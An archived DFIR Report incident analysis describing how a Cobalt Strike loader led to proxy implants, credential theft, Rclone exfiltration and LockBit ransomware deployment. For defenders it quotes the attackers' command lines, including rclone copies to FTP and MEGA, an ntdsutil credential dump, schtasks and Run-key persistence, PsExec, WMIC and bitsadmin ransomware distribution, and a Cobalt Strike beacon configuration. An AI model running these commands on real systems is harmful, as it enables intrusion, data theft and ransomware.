{
	"id": "4aae827b-656c-4a5e-a2e9-26949917df8c",
	"created_at": "2026-04-06T00:10:04.697573Z",
	"updated_at": "2026-04-10T13:11:32.235128Z",
	"deleted_at": null,
	"sha1_hash": "48b8addb3e40a7f846774985d88c3e591b143efa",
	"title": "Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8472139,
	"plain_text": "Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware - The\r\nDFIR Report\r\nBy editor\r\nPublished: 2025-01-27 · Archived: 2026-04-05 20:04:49 UTC\r\nKey Takeaways\r\nThis intrusion began with the download and execution of a Cobalt Strike beacon that impersonated a Windows Media\r\nConfiguration Utility.\r\nThe threat actor used Rclone to exfiltrate data from the environment. First they attempted FTP transfers, which failed,\r\nbefore moving to using MEGA.io. A day later they ran a second successful FTP exfiltration.\r\nThe threat actor created several persistent backdoors in the environment, using scheduled tasks, GhostSOCKS and\r\nSystemBC proxies, and Cobalt Strike command and control access.\r\nLockBit ransomware was deployed across the environment on the 11th day of the intrusion.\r\nThe DFIR Report Services\r\nExplore this case in-depth with our hands-on DFIR Labs!\r\nPrivate Threat Briefs: 20+ private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights\r\nreports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. 
Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nTable of Contents:\r\nCase Summary\r\nServices\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThis intrusion began near the end of January 2024 when the user downloaded and executed a file using the same name\r\n(setup_wm.exe) and executable icon, as the legitimate Microsoft Windows Media Configuration Utility. This executable was\r\na Cobalt Strike beacon and, once executed, an outbound connection was established.\r\nApproximately 30 minutes after the initial execution, the Cobalt Strike beacon initiated discovery commands, starting with\r\nnltest to identify domain controllers. Due to the elevated permissions of the initially compromised user, the threat actor\r\nleveraged SMB and remote services to deploy two proxy tools—SystemBC and GhostSOCKS—onto a domain controller.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 1 of 30\n\nWindows Defender detected these tools on the domain controller, initially leading us to believe that both were blocked.\r\nHowever, while GhostSOCKS was successfully prevented, the SystemBC proxy remained active, establishing a command\r\nand control channel from the domain controller. The threat actor then continued their operations from the beachhead host,\r\nexecuting additional situational awareness commands. 
They then injected code into the WUAUCLT.exe process and\r\nextracted credentials from the LSASS process.\r\nThe injected process was observed loading the Seatbelt and SharpView CLR modules into its memory space.\r\nSimultaneously, the threat actor established persistence by creating scheduled tasks to execute the SystemBC and\r\nGhostSOCKS proxies on the beachhead host.\r\nApproximately an hour into the intrusion, the threat actor moved laterally to a file server by leveraging remote services with\r\nthe same account used to execute the initial access file on the beachhead. This service deployed a Cobalt Strike PowerShell\r\nbeacon, which communicated with a different command and control server than the one associated with the initial access\r\nmalware.\r\nOn the file server, the threat actor deployed the same proxy tools using identical scheduled tasks as those observed on the\r\nbeachhead host. This enabled command and control communication via both the SystemBC and GhostSOCKS proxies.\r\nShortly after, the threat actor initiated an RDP session to the file server through one of the established proxy tunnels.\r\nThe threat actor reviewed running processes using Task Manager before accessing the Local Group Policy Editor on the\r\nhost. Evidence indicates they specifically examined the Windows Defender configurations. Just minutes after this activity,\r\nregistry modifications to Windows Defender settings were observed, leading us to conclude that the threat actor made\r\nchanges in the Local Group Policy Editor.\r\nThe threat actor explored file shares on the server and discovered a sensitive document containing stored credentials. Next,\r\nthey attempted to deploy a Cobalt Strike PowerShell beacon to a backup server. 
When the initial attempt failed, they issued a\r\nremote WMI command from the beachhead host to disable Windows Defender real-time monitoring on the target server.\r\nShortly after, they launched a new remote service for the Cobalt Strike beacon, which successfully established connections\r\nto the command and control server.\r\nThe threat actor continued their discovery efforts by initiating a remote PowerShell session to execute Active Directory\r\nreconnaissance commands. They also attempted to access the NTDS.dit file on the domain controller; however, Windows\r\nDefender appeared to have blocked this attempt. Meanwhile, on the file server, the threat actor executed a binary named\r\ncheck.exe, which conducted various discovery activities. This tool probed remote hosts, gathering information such as their\r\navailability, disk usage, and installed programs.\r\nThe threat actor accessed the backup server via RDP, where they reviewed backup configurations and deployed the\r\nGhostSOCKS proxy, setting up scheduled tasks for persistence. Following this, their activity paused for approximately two\r\nhours before resuming.\r\nAround four hours after initial access, the threat actors began exfiltration activities. They were observed using Internet\r\nExplorer on the file server to access multiple temporary file-sharing sites. Although these sites are commonly used for\r\nstaging payloads, no downloads were detected. This suggests that the threat actors were likely starting data exfiltration rather\r\nthan retrieving additional tools.\r\nAbout 20 minutes after the initial exfiltration attempts, the threat actor transitioned to using Rclone for data exfiltration.\r\nTheir initial efforts to exfiltrate data via FTP failed, as all connection attempts to their configured FTP server were\r\nunsuccessful. This apparent frustration led to a pause in their activity for several hours. 
Upon returning, they deployed a new\r\nGhostSOCKS binary on the file server, this time establishing persistence through a registry run key instead of the previously\r\nused scheduled tasks.\r\nThe threat actor made another attempt at exfiltration using Rclone, this time targeting Mega.io as the remote destination. A\r\nsuccessful connection was established, and large-scale data exfiltration ensued, continuing uninterrupted for approximately\r\n40 minutes.\r\nAfter a 15-hour lull, the threat actor resumed activity by reviewing DNS configurations within the DNS Manager on the\r\ndomain controller. They then returned to the file server and reattempted exfiltration using Rclone with a newly configured\r\nFTP server. This time, the connection was successful, enabling continuous data transfers to the FTP server for approximately\r\n16 hours. Concurrently, while the exfiltration was in progress, they accessed the backup server and executed a PowerShell\r\nscript to extract stored credentials from the backup software’s database.\r\nThe threat actor remained largely dormant until the eleventh day, when they shifted focus to their final objective—\r\nransomware deployment. They designated the backup server as a staging ground, dropping multiple batch scripts designed\r\nto automate the deployment process with built-in redundancies. Leveraging tools such as PsExec and BITSAdmin, they\r\ndistributed the ransomware binary across remote hosts, executing it remotely via both WMI and PsExec. To facilitate the\r\nattack, they deployed additional scripts to disable Windows Defender and modify RDP settings across the network.\r\nThe threat actor systematically executed these scripts, deploying the ransomware binary ds.exe, which was identified as\r\nLockBit ransomware. 
They successfully propagated the ransomware across all Windows hosts within the environment,\r\nachieving a Time to Ransomware (TTR) of just under 239 hours—spanning 11 calendar days from initial access to full\r\ndeployment.\r\nAnalysts\r\nAnalysis and reporting completed by r3nzsec, MyDFIR \u0026 MittenSec\r\nInitial Access\r\nThe intrusion began during January 2024, with the execution of a file named setup_wm.exe, which was downloaded from\r\nthe URL hxxps://accessservicesonline.com/setup_wm.exe\r\nThe file setup_wm.exe was a loader designed to deploy a Cobalt Strike beacon. The domain accessservicesonline[.]com,\r\nwhich hosted the malicious file, has been flagged by multiple security vendors as malicious and linked to activity associated\r\nwith Cobalt Strike.\r\nExecution\r\nThe threat actor used various means to execute malicious files. While they created scheduled tasks on several hosts as a\r\nmeans to maintain persistence, they also manually ran many of them to execute the various malicious proxy tools like\r\nSystemBC and GhostSOCKS.\r\nService execution was also widely used and is discussed in depth in the lateral movement section. Other observed execution\r\npatterns relied on WMI, batch scripts and PsExec, which are covered in other sections specific to their use.\r\nPersistence\r\nScheduled Tasks\r\nWe identified multiple scheduled tasks across several systems within the environment. 
These tasks were not limited to the\r\nbeachhead host but were observed throughout the compromised network.\r\nExample scheduled task configuration XML:\r\nRegistry Run Key\r\nAs a second method of persistence, the threat actor utilized a “Run” key in the Windows registry to enable the automatic\r\nexecution of a GhostSOCKS payload upon user login. This was accomplished through the following PowerShell command:\r\npowershell -WindowStyle hidden -Command \"if (-Not (Test-Path 'HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVers\r\nPrivilege Escalation\r\nThe threat actor utilized process injection techniques, such as injecting into WUAUCLT.exe, a legitimate process, to access\r\ncritical system resources, including the LSASS memory space.\r\nAdditionally, the threat actor created and executed scheduled tasks under SYSTEM privileges to maintain persistence. For\r\nexample, they deployed DLL files (svcmc.dll and svcmcc.dll) via scheduled tasks, ensuring their execution at system\r\nstartup. These tasks were created and run using the following commands:\r\nschtasks /create /ru SYSTEM /sc ONSTART /tn Update2 /tr \"cmd /c rundll32 %PUBLIC%\\music\\svcmc.dll, MainFunc\" s\r\nFurthermore, administrative privileges were leveraged during the lateral movement to execute a PowerShell-based Cobalt\r\nStrike payload on a file server. 
The threat actor also utilized SMB to transfer tools such as the SystemBC DLL and a Golang\r\nbackdoor, both of which were executed through SYSTEM-level scheduled tasks.\r\nDefense Evasion\r\nTo deceive the user, the loader mimicked the legitimate Microsoft Windows Media Configuration Utility by using the same\r\nfile name and executable icon.\r\nAs part of their defense evasion strategy, the threat actor employed several methods to disable Windows Defender. While on\r\na file server, the threat actor edited the group policy setting related to Windows Defender. Threat actor opening group policy:\r\nSection of interest to threat actor:\r\nRegistry modification observed minutes later on the host:\r\nThe command shown below utilizes WMIC to remotely create a process on a backup server. This process then executes a\r\nPowerShell script designed to disable real-time monitoring in Windows Defender.\r\nProcess injection into various legitimate processes on several systems was observed using the CreateRemoteThread API call.\r\nThis occurred with both the initial access file and later with various PowerShell Cobalt Strike beacons.\r\nCredential Access\r\nDuring the credential access phase, the threat actor leveraged the injected process WUAUCLT to access the LSASS memory\r\nspace on the beachhead, a file server, and a backup server. 
The access permissions granted were 0x1010 and 0x1fffff, both of\r\nwhich are indicative of credential theft activities.\r\nThe code 0x1010 is broken down as follows:\r\n0x00000010 (VMRead): Grants the ability to read memory from a process.\r\n0x00001000 (QueryLimitedInfo): Allows retrieval of certain process-related information.\r\nIn contrast, the code 0x1fffff provides full access rights to a process, making it a clear indicator of credential-stealing tools.\r\nA suspicious CallTrace marked with UNKNOWN also revealed injected code activity.\r\nAdditionally, the threat actor attempted to use NTDSUtil via PowerShell remoting to extract credentials. However, this\r\nattempt was prevented by Windows Defender.\r\nAttempted NTDS.dit dump:\r\nC:\\Windows\\System32\\ntdsutil.exe ac in ntds ifm cr fu C:\\users\\public\\music\\1\r\nWindows Defender event logs indicate that an attempt to dump credentials was blocked:\r\nOn a backup server, the threat actor executed a PowerShell script named Veeam-Get-Creds.ps1. This script is publicly\r\navailable on GitHub as a method of recovering passwords from the Veeam Backup and Replication credential manager.\r\nAdditionally, while on a file server, the threat actor was able to locate a file pertaining to shared account(s):\r\nDiscovery\r\nsetup_wm.exe\r\nAround an hour after the initial access occurred, a single PowerShell command was observed from the Cobalt Strike beacon\r\nrunning the well-known nltest Microsoft utility to discover Active Directory domain controllers.\r\nRight after this, the threat actor immediately pivoted to the domain controller. 
But after gaining lateral access to that host,\r\nthey returned to the beachhead for more discovery actions.\r\nAround this same time on the beachhead an injected process, WUAUCLT.exe, was also observed loading Seatbelt and\r\nSharpView modules.\r\nSeatbelt is a post-exploitation tool designed to gather recon about a system. It can collect data like security settings,\r\ncredentials, browser history, and more.\r\nSharpView is an AD recon tool that can map an entire AD environment and provide key details like users, groups,\r\npermissions, and relationships.\r\nDuring the first day, the threat actor dropped a binary check.exe onto a file server.\r\nThis Visual Basic GUI software accepts an IP address as input and generates multiple files with detailed information about\r\nthe corresponding computer.\r\nAround the same time as the threat actor was running check.exe, they initiated a remote PowerShell session to a domain\r\ncontroller to run some Active Directory discovery using PowerShell.\r\nOn a file server the threat actor reviewed Windows Task Manager several times.\r\nThroughout the intrusion the threat actor reviewed Group Policy settings. On the first day, they checked Windows Defender\r\nsettings on a file server. On the final day, they checked on the backup server after completing their ransomware deployment.\r\nLateral Movement\r\nRDP\r\nThe threat actor was observed using RDP during the intrusion. In the first two days, they leveraged a file server as a pivot\r\nhost. 
On the final day, RDP sessions were initiated from the beachhead host to both a file server and a backup server.\r\nAuthentication data from normal 4624 events was absent from the data collected, but using Microsoft-Windows-TerminalServices-LocalSessionManager event ID 21 logs, we were able to identify the logon activity.\r\nWinRM\r\nDuring the first day, the threat actor started a remote PowerShell session from the file server to a domain controller using\r\nWinRM. This session was then used to run Active Directory discovery commands. This was logged in Windows PowerShell\r\nlogs event IDs 4103/4104.\r\nLocal Host:\r\nRemote Host:\r\nWMI\r\nThe threat actors used the WMIC /node option to run a remote command on a backup server and again during ransomware\r\ndeployment; this is covered further in the Defense Evasion and Impact sections.\r\nPsExec\r\nSysinternals’ PsExec was used by the threat actor for remote execution activity related to the ransomware deployment,\r\nreferred to in the Impact section.\r\nRemote Service/SMB\r\nThe threat actors repeatedly leveraged remote services to facilitate lateral movement within the network. 
Their activity\r\nbegan with the deployment of SystemBC and GhostSOCKS proxy tools to a domain controller.\r\nThe following data illustrates SMB network activity used to transfer the proxy tools to the domain controller:\r\nRemote service creation:\r\nThis kind of remote service creation can also be identified over the network with IDS detections such as ET RPC DCERPC\r\nSVCCTL – Remote Service Control Manager Access.\r\nLater they used the jump psexec_psh feature of Cobalt Strike to execute PowerShell beacons on a file share server and\r\nbackup server via remote services.\r\nAfter initial Base64 decoding, we found the payload used the default Cobalt Strike XOR value of 35.\r\nAfter decoding the second layer of obfuscation using the XOR key 35, we have the next layer of base64 strings. We can use\r\nthe XOR key 35 to decode this again. As our next step, we can use the CyberChef recipe below.\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nLabel('Decode')\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nConditional_Jump('',false,'',10)\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nThe PowerShell is base64 encoded. 
Decoding the PowerShell shows that the SMB pipe is named:\r\n\\\\.\\pipe\\fullduplex_84\r\nUpon analyzing the output with Didier Stevens’ 1768.py script, the findings revealed a match to Cobalt Strike shellcode\r\nassociated with psexec_psh activity.\r\nCommand and Control\r\nCobalt Strike (S0154)\r\nThe initial command and control was a Cobalt Strike beacon to compdatasystems.com triggered by the execution of\r\nsetup_wm.exe.\r\nIP Port Domain Ja3 Ja3s\r\n31.172.83.162 443 compdatasystems[.]com a0e9f5d64349fb13191bc781f81f42e1 8ed408107f89c53261bf74e58517bc\r\n31.172.83.162 443 user.compdatasystems[.]com a0e9f5d64349fb13191bc781f81f42e1 8ed408107f89c53261bf74e58517bc\r\n159.100.14.254 443 retailadvertisingservices[.]com a0e9f5d64349fb13191bc781f81f42e1 303951d4c50efb2e991652225a6f02\r\nAs part of the command and control (C2) phase, the threat actor established a connection to a second Cobalt Strike C2 server\r\nusing the IP address 159.100.14.254 over port 443. 
The domain associated with this server was\r\nretailadvertisingservices[.]com.\r\nDuring this activity, process injection was observed, with the threat actor targeting legitimate processes such as svchost.exe.\r\nThe injection activity allowed them to run malicious code within trusted system processes.\r\nCommunication with these command and control servers continued over the length of the intrusion.\r\nThe configuration of the setup_wm.exe beacon is below:\r\n{\r\n \"BeaconType\": [\r\n \"HTTPS\"\r\n ],\r\n \"Port\": 443,\r\n \"SleepTime\": 62760,\r\n \"MaxGetSize\": 1864954,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"compdatasystems.com,/_next.css\",\r\n \"HttpPostUri\": \"/boards\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 814 bytes from the beginning\",\r\n \"Base64 decode\",\r\n \"Base64 decode\"\r\n ],\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\WUAUCLT.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\WUAUCLT.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 1357776117,\r\n \"bStageCleanup\": \"True\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"False\",\r\n \"bProcInject_UseRWX\": \"False\",\r\n \"bProcInject_MinAllocSize\": 10425,\r\n \"ProcInject_PrependAppend_x86\": [\r\n \"kJCQkJCQkJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_PrependAppend_x64\": [\r\n \"kJCQkJCQkJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"RtlCreateUserThread\",\r\n \"CreateRemoteThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"Host: user.compdatasystems.com\"\r\n}\r\nSystemBC\r\nUsing dynamic analysis, we were able to determine several of the dropped files as 
SystemBC.\r\nFile Name SHA256 Hash IP:Port\r\nsvc.dll 2389b3978887ec1094b26b35e21e9c77826d91f7fa25b2a1cb5ad836ba2d7ec4 185.236.232.20:445\r\nsvcmcc.dll 44cf04192384e920215f0e335561076050129ad7a43b58b1319fa1f950f6a7b6 185.236.232.20:445\r\nCommunication to the SystemBC command and control server started on the first day and lasted over the length of the\r\nintrusion.\r\nGhostSOCKS\r\nAnalysis revealed that the other deployed proxy was GhostSOCKS, a Malware-as-a-Service (MaaS) tool.\r\nFile Name SHA256 Hash YARA Hit\r\nsvcmc.dll ced4ee8a9814c243f0c157cda900def172b95bb4bc8535e480fe432ab84b9175 win_ghostsocks_auto\r\nsvchosts.exe b4ad5df385ee964fe9a800f2cdaa03626c8e8811ddb171f8e821876373335e63 win_ghostsocks_auto\r\nThese binaries were deployed on the beachhead host as well as a file share server and a backup server. Upon execution these\r\nbinaries reached out to the following command and control servers:\r\nIP Port URI\r\n38.180.61.247 30001 /api/helper-first-register?buildVersion=EXAMPLE\u0026md5=EXAMPLE\u0026proxyPassword=EXAMPLE\u0026proxyUsername=EXAMPLE\u0026us\r\n195.2.70.38 30001 /api/helper-first-register?buildVersion=EXAMPLE\u0026md5=EXAMPLE\u0026proxyPassword=EXAMPLE\u0026proxyUsername=EXAMPLE\u0026us\r\n91.142.74.28 30001 /api/helper-first-register?buildVersion=EXAMPLE\u0026md5=EXAMPLE\u0026proxyPassword=EXAMPLE\u0026proxyUsername=EXAMPLE\u0026us\r\nTraffic to the GhostSOCKS server was only observed on the first day.\r\nExfiltration\r\nFrom a file share server the threat actor opened Internet Explorer and pulled up two sites, qaz[.]im and temp[.]sh.\r\nBoth of these sites are known as anonymous temporary file sharing services. They are often used to deploy tools or payloads\r\nby threat actors, but in this case we did not observe any downloads. 
This leads us to assess that they likely used the sites for\r\nsome small-scale data exfiltration.\r\nAround 20 minutes later the threat actor moved on to large-scale exfiltration using Rclone.\r\nTheir initial attempt to exfiltrate data with Rclone utilized an FTP configuration targeting a remote server at 93.115.26.127\r\nover port 21. This attempt to exfiltrate data failed because a connection to the remote server could not be established.\r\nThe command that was executed was:\r\n\"%PUBLIC%\\Music\\rclone.exe\" copy E:\\REDACTED\\customers ftp1:REDACTED/customers -q --ignore-existing --REDACTED\r\nTwo hours later, the threat actor changed tactics and leveraged Rclone’s MEGA integration to exfiltrate data to Mega.io. The\r\nfollowing command was executed during this second attempt:\r\n%WINDIR%\\system32\\cmd.exe /C .\\rclone.exe copy \"E:\\REDACTED\\domain\" mega:REDACTED/domain -q --ignore-existing\r\nThis first MEGA attempt successfully led to data exfiltration to the Mega.io storage service. The following day, the threat actor\r\nleveraged a second FTP account and a different server hard-coded into the rclone configuration, achieving another\r\nsuccessful exfiltration.\r\nAnalysis of network logs revealed that several gigabytes of data were exfiltrated over a 16-hour period.\r\nImpact\r\nOn the eleventh day, the threat actor began a ransomware deployment. This final stage included the preparatory steps to\r\ndeploy across the network. 
The process started with the execution of a batch script named SETUP.bat, which created a\r\nstaging file share:\r\n\"%WINDIR%\\System32\\cmd.exe\" /C \"%PUBLIC%\\Music\\SETUP.bat\"\r\nnet session\r\nnet share share$=%PUBLIC%\\Music /GRANT:Everyone,READ /Y\r\nSeveral files, including the LockBit ransomware encryptor, ds.exe, PSExec, and other helper batch scripts, were uploaded to\r\nthis shared directory to facilitate the ransomware deployment. These scripts included redundancy for sharing the\r\nransomware binary and executing it.\r\nNext, a script named WMI.bat utilized WMI to copy the ransomware payload from the shared directory (SHARE$) to local\r\nmachines and execute it. Notably, the threat actor did not limit their targeting to specific hosts but aimed at all accessible\r\nhosts within identified subnets. The payload execution command was as follows:\r\n%WINDIR%\\system32\\cmd.exe /c \"\"%PUBLIC%\\Music\\WMI.bat\" %PUBLIC%\\Music\\SETUP.bat %PUBLIC%\\Music\\COPY.bat %PUBLI\r\nWMI commands further facilitated payload distribution, leveraging bitsadmin to transfer and execute the ransomware on\r\nremote hosts. These commands triggered parent-child process chains, such as wmiprvse.exe spawning the bitsadmin\r\ncommands:\r\nwmic /node:ipv4address,REDACTED,REDACTED,REDACTED,REDACTED /user:\"domain.local\\Administrator\" /password:\"REDAC\r\nAdditionally, the threat actor employed a batch script named COPY.bat to use PSExec for copying the payload from the\r\nshared directory to target machines. Evidence of PSExec executions was identifiable by Service Creation events (Event ID\r\n7045) and execution of PSEXESVC.exe. The relevant commands were:\r\nSource Host executing copy.bat and, by extension, PsExec.exe:\r\nPsExec.exe /accepteula @comps1.txt -u \"domain.local\\Administrator\" -p \"REDACTED\" cmd /c COPY \"\\\\REDACTED\\share\r\n1. 
Source Host Execution\r\n%WINDIR%\\system32\\cmd.exe /c \"\"%PUBLIC%\\Music\\share$\\COPY.bat\"\r\n └── \"PsExec.exe /accepteula -d \\\\REDACTED -u \"domain.local\\Administrator\" -p \"REDACTED\" cmd /c COPY\r\nDestination Host executing the command to copy the LockBit encryptor to the local machine:\r\n2. Service Execution (Destination Host)\r\nPSEXESVC.exe\r\n └── \"cmd\" /c COPY /Y \"\\\\REDACTED\\share$\\ds.exe\" \"%PUBLIC%\\Music\"\r\nThe threat actor executed the LockBit encryptor using a batch file named EXE1.bat, which leveraged PSExec to run the\r\nransomware binary, ds.exe, on the hosts, copying it into their Windows temporary folders.\r\nLockBit Execution from Source host via PSExec:\r\n%WINDIR%\\system32\\cmd.exe /c \"\"C:\\share$\\EXE1.bat\" \"\r\n └── C:\\share$\\PsExec.exe -d @C:\\share$\\comps1.txt -u \"domain.local\\Administrator\" -p \"REDACTED\" cmd\r\nThe threat actor also utilized a modified version of WMI1.bat to distribute and execute the payload via WMI commands,\r\ntargeting hosts listed in an input file. This phase exhibited similar process behavior as earlier, with wmiprvse.exe spawning\r\nthe transfer tasks:\r\n1. LockBit Execution from Source host via WMIC:\r\n%WINDIR%\\system32\\cmd.exe /c \"\"C:\\share$\\WMI1.bat\" \"\r\n └── wmic /node:@C:\\share$\\comps1.txt /user:\"domain.local\\Administrator\" /password:\"REDACTED\" process\r\nSimilar to the previous WMI execution, on the remote host, wmiprvse.exe will be responsible for spawning the Bitsadmin\r\ntransfer job.\r\n2. LockBit Execution on Destination host via WMIC:\r\nwmiprvse.exe\r\n └── cmd.exe /c bitsadmin /transfer ds \\\\REDACTED\\share$\\ds.exe %APPDATA%\\ds.exe\u0026%APPDATA%\\ds.exe -pa\r\n └── bitsadmin /transfer ds \\\\REDACTED\\share$\\ds.exe %APPDATA%\\ds.exe\r\nThe entire deployment activity took approximately two hours. 
Despite several errors during execution, the threat actor\r\nsuccessfully deployed the LockBit ransomware. Encrypted hosts displayed a modified desktop background, redirecting users\r\nto the ransom note.\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\nhxxps://accessservicesonline[.]com/setup_wm.exe\r\nCobalt Strike:\r\n31.172.83[.]162:443\r\nuser[.]compdatasystems[.]com\r\ncompdatasystems[.]com\r\n159.100.14[.]254:443\r\nretailadvertisingservices[.]com\r\nSystemBC:\r\n185.236.232[.]20:445\r\nGhostSOCKS:\r\n91[.]142[.]74[.]28|30001\r\n195[.]2[.]70[.]38|30001\r\n38[.]180[.]61[.]247|30001\r\nFTP exfiltration servers:\r\n93.115.26[.]127:21\r\n46.21.250[.]52:21\r\nComputed\r\nFile: svchosts.exe\r\n6505b488d0c7f3eaee66e3db103d7b05\r\nbf2b396b8fb0b1de27678aab877b6f177546d1c5\r\nb4ad5df385ee964fe9a800f2cdaa03626c8e8811ddb171f8e821876373335e63\r\nFile: dfg.exe\r\n671b967eb2bc04a0cd892ca225eb5034\r\nab1777107d9996e647d43d1194922b810f198514\r\nb79bb3302691936df7c3315ff3ba7027f722fc43d366ba354ac9c3dac2e01d03\r\nFile: svc.dll\r\n03af38505cee81b9d6ecd8c1fd896e0e\r\n1ac66fcc34c0b86def886e4e168030dae096927c\r\n2389b3978887ec1094b26b35e21e9c77826d91f7fa25b2a1cb5ad836ba2d7ec4\r\nFile: Veeam-Get-Creds.ps1\r\n0f7b6bb3a239cf7a668a8625e6332639\r\n5263a135f09185aa44f6b73d2f8160f56779706d\r\n18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88\r\nFile: 
svcmc.dll\r\nMD5: ea327ed0a3243847f7cd87661e22e1de\r\nSHA1: 450d54d5737164579416ca99af1eb3fa1d4aaff9\r\nSHA256: ced4ee8a9814c243f0c157cda900def172b95bb4bc8535e480fe432ab84b9175\r\nFile: setup_wm.exe\r\nMD5: 57f791f7477b1f7a1b3605465d054db8\r\nSHA1: bba1bc3ebf07ca3c4e2442f0ba9ea18383ce627b\r\nSHA256: d8b2d883d3b376833fa8e2093e82d0a118ba13b01a2054f8447f57d9fec67030\r\nFile: check.exe\r\nMD5: 6e91c474d90546845b1f3f9e7a33411a\r\nSHA1: 9352236ad6fe8835979cf11ba5033f8f2fef0f19\r\nSHA256: 3f97e112f0c5ddf0255ef461746a223208dc0846bde2a6dca9c825d9c706a4e9\r\nFile: svcmcc.dll\r\nMD5: 0aa05ebc3b6667954898cfccc4057600\r\nSHA1: c59cbd309b3393cb08a1133364ed11000fdd418d\r\nSHA256: 44cf04192384e920215f0e335561076050129ad7a43b58b1319fa1f950f6a7b6\r\nFile: sd.exe\r\nMD5: 2800a10c4afae44978d906b2abaed745\r\nSHA1: 84019de427aef1f1e4f32b579767bee6d0bd1e64\r\nSHA256: c1173628f18f7430d792bbbefc6878bced4539c8080d518555d08683a3f1a835\r\nFile: SETUP.bat\r\nMD5: d9adb3dd6df169e824b2867a2b8cba89\r\nSHA1: b077ea03b207cc8b8b48b9b4f9a58dabbd39f678\r\nSHA256: 7673a949181e33ff8ed77d992a2826c25b8da333f9e03213ae3a72bb4e9a705d\r\nFile: ds.exe\r\nMD5: 71c8c1a0056fd084bc32a03d9245ad10\r\nSHA1: 5de1f72ffeea1ecbd287b0ca8ddb2c5264d9acb5\r\nSHA256: 59c9d10f06f8cb2049df39fb4870a81999fd3f8a79717df9b309fadeb5f26ef9\r\nFile: EXE1.bat\r\nMD5: 573a213191985c555dd7e8de5f0a9cae\r\nSHA1: aa19a1648d680c3bfbee7dcc3df41ce98af8e121\r\nSHA256: ba9b879fdc304bd7f5554528fb8e858ef36ad4657fedfefb8495f43ce73fc6f1\r\nFile: EXE.bat\r\nMD5: 4457256150386acec794e9e8ee412691\r\nSHA1: c6d54322a17e754150e61f7caa91226a84b0b774\r\nSHA256: 10ce939e4ee8b5285d84c7d694481ebbdf986904938d07f7576d733e830ed012\r\nFile: COPY.bat\r\nMD5: 6d44c5fb49258f285769e50830fc59af\r\nSHA1: da6771fbbcfaf195b80925cefc880794d62d61bf\r\nSHA256: 3af3f2d08aa598ab4f448af1b01a5ad6c0f8e8982488ebf4e7ae7b166e027a8b\r\nFile: WMI.bat\r\nMD5: 40852fde665eb9119fcc565bd68de680\r\nSHA1: 956e020206c4dc4240537d07be022e86ed918ed1\r\nSHA256: 578a2ac45e40a686a5f625bbc7873becd8eb9fe58ea07b1d318b93ee0d127d4e\r\nFile: RDP.bat\r\nMD5: 996ad32c7ae2190b7fa7876df0d7b717\r\nSHA1: 4a1e667e0c3550f4446903570adbe7776699d4ca\r\nSHA256: 791157675ad77b0ae9feabd76f4b73754a7537b7a9a2cc74bd0924d65be680e1\r\nFile: WMI1.bat\r\nMD5: 90f9044cfee2c678fe51abd098bdfe97\r\nSHA1: e3619582f4d81ca180dee161bbe49d499b237119\r\nSHA256: c4863cc28e01713e6a857b940873b0e5caedfd1fcb9b2a8d07ffb4c0c48379d5\r\nFile: COPY1.bat\r\nMD5: b254f8f03e61bd9469df66c189d79871\r\nSHA1: 45337ae989cd62d07059f867ce62ff6b6fc90819\r\nSHA256: 9bcaad9184b182965923a141f52fb75ddd1975b99ab080869896cee5879ecfad\r\nFile: DEF.bat\r\nMD5: 4794accd22271a28547fb3613ee79218\r\nSHA1: ccc6b5bf9591fa9a3d57fd48ee0c9c49a6d22da9\r\nSHA256: 53828f56c6894a468a091c8858d2e29144b68d5de8ff1d69a567e97aac996026\r\nDetections\r\nNetwork\r\nET POLICY PsExec service created\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nETPRO MALWARE Cobalt Strike Related Domain in DNS Lookup\r\nET POLICY Possible Powershell .ps1 Script Use Over 